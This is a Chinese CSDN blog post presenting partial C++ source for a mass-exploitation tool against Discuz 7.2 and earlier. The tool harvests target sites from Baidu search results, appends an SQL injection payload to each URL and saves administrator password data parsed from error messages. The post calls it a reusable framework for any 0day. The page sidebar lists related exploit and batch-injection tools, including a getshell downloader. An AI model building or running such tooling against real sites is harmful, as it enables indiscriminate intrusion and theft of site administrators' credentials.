c++写的discuz<=7.2 SQL注入漏洞,批量注入工具

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量943 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012187684/article/details/38562273
版权
1、得到百度搜索的结果
        for (nBaiDuPage=100;nBaiDuPage<200;nBaiDuPage++)
        {
                //int 转换成string
                sprintf(tmpChar,"%d",nBaiDuPage);
                tmpStr=tmpChar;
                tmpStr=sUrlFromBaiDu+tmpStr;
                GetResult("date.html","result.txt","\"g\">",
                        "/",tmpStr);
2、读出链接,实现访问并得到返回的信息,注意,是报错的返回结果
3、循环测试,找到特征字符,有则读出并保存
测试主要源码
        while(fgets(buf,255,fResult))//
        {
        
                FILE *fp = fopen("tmp.txt", "w");        // 
                sUrlFromResult=buf;
                nRN=sUrlFromResult.find("\r\n",0);
                if (nRN>0)
                {
                        sUrlFromResult=sUrlFromResult.substr(0,nRN);
                }
                
                sUrl=sUrlHeader+sUrlFromResult+sOday;
                cout<<"测试第"<<jishu<<"个链接"<<"\r\n";
                   .....
                       nret=sBuffer.find("Duplicate ",0);
                
                        if (nret>0)
                        {
                                cout<<"GoodJob!";
                                cout<<"\r\n";
                                nlast=sBuffer.find("'",nret+20);
                                substrTmp=sBuffer.substr(nret+17,nlast-nret-17);
                                fUrlAdminPwd<<sUrlFromResult.c_str();
                                fUrlAdminPwd<<"   result:";
                                fUrlAdminPwd<<substrTmp.c_str();
                                fUrlAdminPwd<<"\r\n";
                                fUrlAdminPwd.flush();
                        }
                }


        
        } 
运行效果


这个写的是个框架,我们可以随意改变0day就可以实现该0day的批量工具,所以只给出了思路,没有全部放出源码。
陈刚12
关注
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1692
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
⽹络安全学习计划
qq_45541451的博客
07-15 6688
网络安全脚本小子学习计划 如何成为脚本小子第N天,制定的学习计划 网络安全的具体学习计划网络安全脚本小子学习计划第⼀阶段~信息安全基础1、信息安全基础2、nmap安装与使⽤3、burpsuite安装与使⽤⼆、Web基础三、Web安全⼊⻔四、信息收集五、漏洞原理第⼆阶段~基础知识学习⼀、程序设计⼆、⽹络技术三、Linux四、数据库拓展第三阶段~渗透测试实战与⽹络安全⼀、web安全基础与拓展⼆、web安全攻防⼀、环境搭建⼆、WEB安全⼯具基础部分三、常⻅web漏洞解析四、web安全⼯具进阶及拓展五、web安全
超级SQL批量注入工具
12-14
sql注入,超级sql注入,数据库注入sql注入检测,sql批量注入检测工具
Discuz! 7.2 SQL注入exp
weixin_33728268的博客
07-06 211
已经有人出一些工具了,但是感觉不怎么好用,就自己了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。 下载地址:DZ7.2 附代码: &lt;?php   /**  * @author: xiaoma  * @blog  : www.i0day.com  * ...
SQLi-db 批量注入工具+教程
weixin_30539835的博客
01-23 414
这款工具在中国还没人发.所以我发来给大家玩玩;顺便带了教程. 关键字:inurl:article.asp?id= inurl:article.php?id=inurl:article.jsp?id=(关键字自设)功能:Search Engine:搜索引擎:Remove Duplicate:删除重复的:Deep scan:深度扫描:Proxy:代理: Total Result:...
c语言sql注入,C/C++知识点之[C++]简单的SQL注入过滤
weixin_33980343的博客
05-24 744
本文主要向大家介绍了 C/C++知识点之[C++]简单的SQL注入过滤,通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。前几天帮一个客户了一个C++连接MySQL,当他用到他的游戏中后,被人注射了,用了一个永真式,无限的刷了游戏装备所以,我针对参数和整体SQL语句了两个简单的函数,进行简单的过滤boolCheckSQL(stringsql){stringkey[9]=...
注入批量扫描工具
12-22
这是一个sql注入批量扫描工具,利用百度的关键词搜索,自动记录和识别可能存在注入的url
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具
weixin_46280935的博客
09-10 5650
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 1340
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
在宝塔下安装sphinx
繁的博客
07-07 1908
我是在阿里云上面购买的linux服务器,环境安装的是PHP7.2+ apache+mysql 宝塔安装我这里就不介绍啦,看我的另外一篇博文。 这篇文章主要介绍是安装宝塔之后安装sphinx,假如不是,要按下面的安装方式 1、安装一般都安装到/usr/local/sphinx (sphinx这个目录是自定义的) 2、 在此目录使用tar命令解压 :tar zxvf sphinx-2.3.1-...
注入批量扫描工具-2018
04-28
傀儡注入批量扫描工具-2018,上传于2018年4月28日。
注入批量扫描工具V5.2
12-26
注入批量扫描工具V5.2
超级SQL注入工具V1.0正式版源码
03-31
C# vs2015开发 官方下载地址: http://www.shack2.org/article/1417357815.html 简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。 超级SQL注入工具支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。 超级SQL注入工具支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具支持Bool型盲注、错误显示注入、Union注入等方式获取数据。 超级SQL注入工具支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。 本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持全自动识别注入标记,也可人工识别注入并标记。 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
极光-SQL注入
11-08
极光-SQL注入
自己动手编SQL注入漏洞扫描工具
12-19
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
网站漏洞扫描注入批量getshell工具
ghoulcheen的博客
10-16 3570
好用的辅助软件很少 但是小编能保证这个工具一定好用 而且效果是杠杠的! 懂得人一看就懂,不懂得请绕道 下载好以后请联系软件上的联系方式,与管理员取得联系后 会得到试用权限,完全免费! 下载地址 https://www.lanzous.com/i6t89vi ...
注入批量收集工具_头条号多个账号一键发布工具,多平台同时发布
weixin_39639568的博客
11-28 360
头条号多个账号一键发布工具,多平台同时发布,现在使用一键发布工具进行头条号内容发布的自媒体人有很多,尤其是头条号作为自媒体主流平台,在各大平台里,所占的人数也具有一定的数量,很多人不是只运营头条号一个平台,其他的平台也有在运营。由于平台账号的增加,大多数人在内容分发上面花费的时间越来越多,这个时候大家就可以用到蚁小二一键发布工具,5分钟就可以把内容发布到多个平台,还能批量导入上百个账号,检测文章原...
c/c++待续动态内存及SQL注入
那一片天的专栏
12-24 1169
SQL攻击,不是利用操作系统的BUG实现攻击,而是利用程序员的疏忽,通过SQL语句,实现无账号登陆,甚至篡改数据库       常见的内存错误及其对策   1 内存未分配成功却使用了它(accert判空)   2 内存分配虽然成功,但尚未初始化就引用它(错误原因:一是没有初始化的概念;二是以为初始化全为零,导致引用错误(例如数组))   3内存分配成功并且已经初始化,但操作
C++通用漏洞汇总
thesum的专栏
04-07 976
http://cwe.mitre.org/data/lists/659.html
C/C++实现英文大小转换方法及工具应用
此外,C++标准库还提供了`<algorithm>`头文件中的`transform()`函数来对字符串中的每个字符进行统一的操作,这为批量转换提供了便利。 接下来将详细说明如何使用C和C++实现大小转换的具体代码实现。 **C语言实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值